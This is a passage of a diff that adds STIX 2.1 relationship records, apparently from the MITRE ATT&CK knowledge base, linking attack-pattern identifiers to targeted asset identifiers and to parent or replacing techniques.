"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d1256063-8cf4-4c89-9b01-016886c0984b", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d12eb6a1-bb15-4d95-8390-667cda87923e", + "created": "2020-10-02T17:09:50.903Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2d3f5b3c-54ca-4f4d-bb1f-849346d31230", + "target_ref": "attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d1353848-248c-4720-89a3-7e61090192fd", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d15d091e-a720-4fb5-acfc-0982e23fe185", + "created": "2020-01-24T15:00:47.394Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--7c93aa74-4bc0-4a9e-90ea-f25f86301566", + "target_ref": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d1651c82-8b4e-4aef-b065-732cf12e7b79", + "created": "2021-01-22T16:08:40.748Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", + "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d19df866-cc87-4b8b-a953-113f6081a63b", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d1a97502-b41d-40a8-aff5-13367fefc642", + "created": "2023-09-28T21:21:45.003Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:21:45.003Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d1bd77d4-9f1a-41ee-bf64-0aa7438e6896", + "created": "2023-09-29T16:28:52.111Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:28:52.111Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d1deffba-9885-4b52-b2b5-cbfcec82a52b", + "created": "2023-09-25T12:41:26.902Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-25T12:41:26.902Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--cfb525cc-5494-401d-a82b-2539ca46a561", + "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d1fa07b3-7b41-4a97-a7f7-5ec216c49357", + "created": "2024-06-26T11:53:14.007Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T11:53:14.007Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d22ece00-47b3-490f-ae64-8d8c1f0cc8df", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d23fd724-563d-4f49-8bcd-09c653728cd3", + "created": "2023-09-28T21:28:00.462Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:28:00.462Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d24353ad-cd2b-463c-ae64-d9f2d733d3a7", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d2468213-1073-43d0-bd10-020b23597a6f", + "created": "2020-06-23T22:28:28.085Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", + "target_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d25d85fe-4606-4eef-aa4d-104a40faeeb3", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d28c4c91-11f5-4eaa-a003-e6a23cd92a77", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d292e280-c2d4-4506-bcb9-98024b37a347", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d2936403-813f-461f-86be-20e4c9ba1b90", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d2985b8a-7a29-4b57-b2f1-cddd79fe4242", + "created": "2023-09-28T19:53:20.304Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:53:20.304Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d2b583f5-66fc-481f-be06-d191f41a34de", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d2c95b2e-470b-4be3-a957-7dc8fa03c52f", + "created": "2024-06-25T13:24:15.086Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-25T13:24:15.086Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d31ed833-b595-47be-a07e-9d0275148f66", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d3266f04-3453-492d-b9ea-6fb9d0ce3999", + "created": "2023-09-29T18:49:54.378Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:49:54.378Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d33fe043-36fd-4725-8465-a49b91fb7ffc", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d343f668-70db-4020-a425-dc195679ecc3", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d3564f1f-8637-4878-a66a-3e8ea46f7a72", + "created": "2023-09-28T19:38:27.199Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:38:27.199Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d362a2d2-4b79-40f1-9792-342633288fc0", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d36761bc-1c01-4870-af28-da84bbaf1f58", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d37185b8-c98a-49e0-aa4f-002dbcbcf261", + "created": "2024-06-21T14:12:20.269Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.269Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d38143e1-4bf0-4a09-a8c8-1ccb78887df1", + "created": "2024-06-27T09:21:20.869Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:21:20.869Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d389abad-ea54-4ded-b925-85f8409daf8d", + "created": "2024-05-22T17:24:28.124Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:21:48.201Z", + "description": "Asset Mapping Rationale: Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may also leverage a Network Device CLI on network devices to gather file and directory information.", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d3a3d5c2-a7d0-41b8-9f27-4fafc47ec97d", + "created": "2022-04-22T18:50:50.487Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-25T14:00:00.188Z", + "description": "", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--36675cd3-fe00-454c-8516-aebecacbe9d9", + "target_ref": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d3ab918d-f986-4688-9927-b7e80a192b4a", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d3b2c34a-dae1-4c5c-ba65-c574e2887854", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--215d9700-5881-48b8-8265-6449dbb7195d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d3b32b3e-1a1a-4cf9-b1c3-15e987d3b659", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d3b4c41f-53ef-4219-9722-6bfae358c1d4", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d3ca9218-dd1f-4e71-8e00-75a84d965270", + "created": "2024-06-21T14:12:20.269Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.269Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d3cbff81-245f-4025-a24a-f9ca5e006fb4", + "created": "2020-01-24T15:11:53.692Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--723e3a2b-ca0d-4daa-ada8-82ea35d3733a", + "target_ref": 